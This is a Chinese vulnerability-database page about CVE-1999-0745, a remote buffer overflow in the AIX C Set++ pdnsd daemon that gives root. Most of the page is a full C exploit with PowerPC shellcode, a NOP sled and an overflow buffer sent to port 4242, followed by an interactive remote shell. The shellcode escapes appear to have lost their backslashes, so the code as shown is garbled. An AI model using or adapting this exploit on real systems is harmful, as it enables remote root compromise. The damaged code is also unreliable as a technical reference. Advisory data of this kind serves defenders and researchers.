子比主题,更优雅的Wordpress主题
更优雅的WordPress网站主题:子比主题!全面开启

AIX pdnsd远程缓冲区溢出漏洞

280

AIX pdnsd远程缓冲区溢出漏洞

漏洞ID 1105513 漏洞类型 边界条件错误
发布时间 1999-08-17 更新时间 2005-05-02
图片[1]-AIX pdnsd远程缓冲区溢出漏洞-安全小百科CVE编号 CVE-1999-0745
 		图片[2]-AIX pdnsd远程缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-199908-030
漏洞平台 AIX CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/21093
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199908-030
|漏洞详情
源代码浏览器的ProgramDatabaseNameServerDaemon(pdnsd)是IBM’sCSet++forAIX的组件。pdnsd存在一个缓冲区溢出漏洞,本地和远程攻击者可以利用这个漏洞获得系统的root用户权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/3237/info

The Source Code Browser's Program Database Name Server Daemon (pdnsd) component of the C Set ++ compiler for AIX contains a remotely exploitable buffer overflow. This vulnerability allows local or remote attackers to compromise root privileges on vulnerable systems.

/*## copyright LAST STAGE OF DELIRIUM oct 1999 poland        *://lsd-pl.net/ #*/
/*## pdnsd                                                                   #*/

/*   note: to avoid potential system hang-up please, first obtain the exact   */
/*   AIX OS level with the use of some OS fingerprinting method               */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>

#define ADRNUM 4000
#define NOPNUM 4800
#define ALLIGN 1

#define SCAIX41 "x03x68x41x5ex6dx7fx6fxd6x57x56x55x53"
#define SCAIX42 "x02x71x46x62x76x8ex78xe7x5bx5ax59x58"

char syscallcode[]=
    "x7ex94xa2x79"     /* xor.    r20,r20,r20            */
    "x40x82xffxfd"     /* bnel    <syscallcode>          */
    "x7exa8x02xa6"     /* mflr    r21                    */
    "x3axc0x01xff"     /* lil     r22,0x1ff              */
    "x3axf6xfex2d"     /* cal     r23,-467(r22)          */
    "x7exb5xbax14"     /* cax     r21,r21,r23            */
    "x7exa9x03xa6"     /* mtctr   r21                    */
    "x4ex80x04x20"     /* bctr                           */
    "xffxffxffxff"
    "xffxffxffxff"
    "xffxffxffxff"
    "x4cxc6x33x42"     /* crorc   cr6,cr6,cr6            */
    "x44xffxffx02"     /* svca    0x0                    */
    "x3axb5xffxf8"     /* cal     r21,-8(r21)            */
;

char findsckcode[]=
    "x2cx74x12x34"     /* cmpi    cr0,r20,0x1234         */
    "x41x82xffxfd"     /* beql    <findsckcode>          */
    "x7fx08x02xa6"     /* mflr    r24                    */
    "x3bx36xfex2d"     /* cal     r25,-467(r22)          */
    "x3bx40x01x01"     /* lil     r26,0x16               */
    "x7fx78xcax14"     /* cax     r27,r24,r25            */
    "x7fx69x03xa6"     /* mtctr   r27                    */
    "x4ex80x04x20"     /* bctr                           */
    "xa3x78xffxfe"     /* lhz     r27,-2(r24)            */
    "xa3x98xffxfa"     /* lhz     r28,-6(r24)            */
    "x7cx1bxe0x40"     /* cmpl    cr0,r27,r28            */
    "x3bx36xfex59"     /* cal     r25,-423(r22)          */
    "x41x82xffxe4"     /* beq     <findsckcode+20>       */
    "x7fx43xd3x78"     /* mr      r3,r26                 */
    "x38x98xffxfc"     /* cal     r4,-4(r24)             */
    "x38xb8xffxf4"     /* cal     r5,-12(r24)            */
    "x93x38xffxf4"     /* st      r25,-12(r24)           */
    "x88x55xffxf6"     /* lbz     r2,-10(r21)            */
    "x7exa9x03xa6"     /* mtctr   r21                    */
    "x4ex80x04x21"     /* bctrl                          */
    "x37x5axffxff"     /* ai.     r26,r26,-1             */
    "x2dx03xffxff"     /* cmpi    cr2,r3,-1              */
    "x40x8axffxc8"     /* bne     cr2,<findsckcode+32>   */
    "x40x82xffxd8"     /* bne     <findsckcode+48>       */
    "x3bx36xfex03"     /* cal     r25,-509(r22)          */
    "x3bx76xfex02"     /* cal     r27,-510(r22)          */
    "x7fx23xcbx78"     /* mr      r3,r25                 */
    "x88x55xffxf7"     /* lbz     r2,-9(r21)             */
    "x7exa9x03xa6"     /* mtctr   r21                    */
    "x4ex80x04x21"     /* bctrl                          */
    "x7cx7axdax14"     /* cax     r3,r26,r27             */
    "x7ex84xa3x78"     /* mr      r4,r20                 */
    "x7fx25xcbx78"     /* mr      r5,r25                 */
    "x88x55xffxfb"     /* lbz     r2,-5(r21)             */
    "x7exa9x03xa6"     /* mtctr   r21                    */
    "x4ex80x04x21"     /* bctrl                          */
    "x37x39xffxff"     /* ai.     r25,r25,-1             */
    "x40x80xffxd4"     /* bge     <findsckcode+100>      */
;

char shellcode[]=
    "x7cxa5x2ax79"     /* xor.    r5,r5,r5               */
    "x40x82xffxfd"     /* bnel    <shellcode>            */
    "x7fxe8x02xa6"     /* mflr    r31                    */
    "x3bxffx01x20"     /* cal     r31,0x120(r31)         */
    "x38x7fxffx08"     /* cal     r3,-248(r31)           */
    "x38x9fxffx10"     /* cal     r4,-240(r31)           */
    "x90x7fxffx10"     /* st      r3,-240(r31)           */
    "x90xbfxffx14"     /* st      r5,-236(r31)           */
    "x88x55xffxf4"     /* lbz     r2,-12(r21)            */
    "x98xbfxffx0f"     /* stb     r5,-241(r31)           */
    "x7exa9x03xa6"     /* mtctr   r21                    */
    "x4ex80x04x20"     /* bctr                           */
    "/bin/sh"
;

char nop[]="x7fxffxfbx78";

main(int argc,char **argv){
    char buffer[10000],address[4],*b;
    int i,n,l,cnt,sck;
    struct hostent *hp;
    struct sockaddr_in adr;

    printf("copyright LAST STAGE OF DELIRIUM oct 1999 poland  //lsd-pl.net/n");
    printf("pdnsd for AIX 4.1 4.2 PowerPC/POWERnn");

    if(argc!=3){
        printf("usage: %s address 41|42n",argv[0]);exit(-1);
    }

    switch(atoi(argv[2])){
    case 41: memcpy(&syscallcode[32],SCAIX41,12); break;
    case 42: memcpy(&syscallcode[32],SCAIX42,12); break;
    default: exit(-1);
    }

    sck=socket(AF_INET,SOCK_STREAM,0);
    adr.sin_family=AF_INET;
    adr.sin_port=htons(4242);
    if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
        if((hp=gethostbyname(argv[1]))==NULL){
            errno=EADDRNOTAVAIL;perror("error");exit(-1);
        }
        memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
    }

    if(connect(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){
        perror("error");exit(-1);
    }

    l=ADRNUM+NOPNUM+strlen(shellcode);
    *((unsigned long*)address)=htonl(0x2ff20908+(NOPNUM>>1));

    i=sizeof(struct sockaddr_in);
    if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
        struct netbuf {unsigned int maxlen;unsigned int len;char *buf;}nb;
        ioctl(sck,(('S'<<8)|2),"sockmod");
        nb.maxlen=0xffff;
        nb.len=sizeof(struct sockaddr_in);;
        nb.buf=(char*)&adr;
        ioctl(sck,(('T'<<8)|144),&nb);
    }
    n=ntohs(adr.sin_port);
    printf("port=%d connected! ",n);fflush(stdout);

    findsckcode[0+2]=(unsigned char)((n&0xff00)>>8);
    findsckcode[0+3]=(unsigned char)(n&0xff);

    b=buffer;
    *((unsigned long*)b)=htonl(l);
    b+=4;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(syscallcode);i++) *b++=syscallcode[i];
    for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
    for(i=0;i<strlen(shellcode);i++)   *b++=shellcode[i];
    for(i=0;i<ALLIGN;i++) *b++=address[i%4];
    for(i=0;i<ADRNUM;i++) *b++=address[i%4];
    *b=0;

    write(sck,buffer,4+l-1);sleep(3);
    send(sck,"x",1,0);
    printf("sent!n");

    write(sck,"/bin/uname -an",14);
    while(1){
        fd_set fds;
        FD_ZERO(&fds);
        FD_SET(0,&fds);
        FD_SET(sck,&fds);
        if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
            int cnt;
            char buf[1024];
            if(FD_ISSET(0,&fds)){
                if((cnt=read(0,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                    else break;
                }
                write(sck,buf,cnt);
            }
            if(FD_ISSET(sck,&fds)){
                if((cnt=read(sck,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                    else break;
                }
                write(1,buf,cnt);
            }
        }
    }
}
|参考资料

来源:BID
名称:590
链接:http://www.securityfocus.com/bid/590
来源:CIAC
名称:J-059
链接:http://www.ciac.org/ciac/bulletins/j-059.shtml
来源:NSFOCUS
名称:4025
链接:http://www.nsfocus.net/vulndb/4025

相关推荐: WebCalendar SQL Injection Vulnerability

WebCalendar SQL Injection Vulnerability 漏洞ID 1097131 漏洞类型 Input Validation Error 发布时间 2005-02-17 更新时间 2005-02-17 CVE编号 N/A CNNVD-I…

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
网络安全漏洞
# 漏洞# cnnvd# aix
喜欢就支持一下吧
点赞0
分享
相关推荐
安全小百科-Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
3年前 4771
安全小百科-帆软10.0 Getshell漏洞分析
帆软10.0 Getshell漏洞分析
帆软10.0 Getshell漏洞分析
3年前 1194
安全小百科-Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
3年前 588
安全小百科-Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
3年前 531
安全小百科-iChat ROOMS Webserver任意文件读取漏洞
iChat ROOMS Webserver任意文件读取漏洞
iChat ROOMS Webserver任意文件读取漏洞
3年前 523
安全小百科-gnubiff多个远程POP3协议漏洞
gnubiff多个远程POP3协议漏洞
gnubiff多个远程POP3协议漏洞
3年前 459
搜索
开启精彩搜索
标签云
龟背龚某龙鱼龙马龙首龙车龙身龙芯龙生九子龙火龙海市龙泉驿区龙岩市龙女龙南县龙凤龙伯龍首龍門龍身
公司成功上市啦! - 作者:KOAL格尔国信-安全小百科

公司成功上市啦! – 作者:KOAL格尔国信

admin的头像-安全小百科3年前
049730
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion-安全小百科

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

admin的头像-安全小百科3年前
47710
GeoServer漏洞利用总结及案例参考 - 作者:vlong6-安全小百科

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

admin的头像-安全小百科3年前
020430
女祭女戚-安全小百科

女祭女戚

admin的头像-安全小百科3年前
012860
帆软10.0 Getshell漏洞分析-安全小百科

帆软10.0 Getshell漏洞分析

admin的头像-安全小百科3年前
011940
科锐逆向线上班完整版视频2020年 - 作者:hgjhf63fa-安全小百科

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

admin的头像-安全小百科3年前
010510
恐龙抗狼扛的头像-安全小百科

恐龙抗狼扛1年前0

kankan
admin的头像-安全小百科

啊啊啊啊3年前0

66666666666666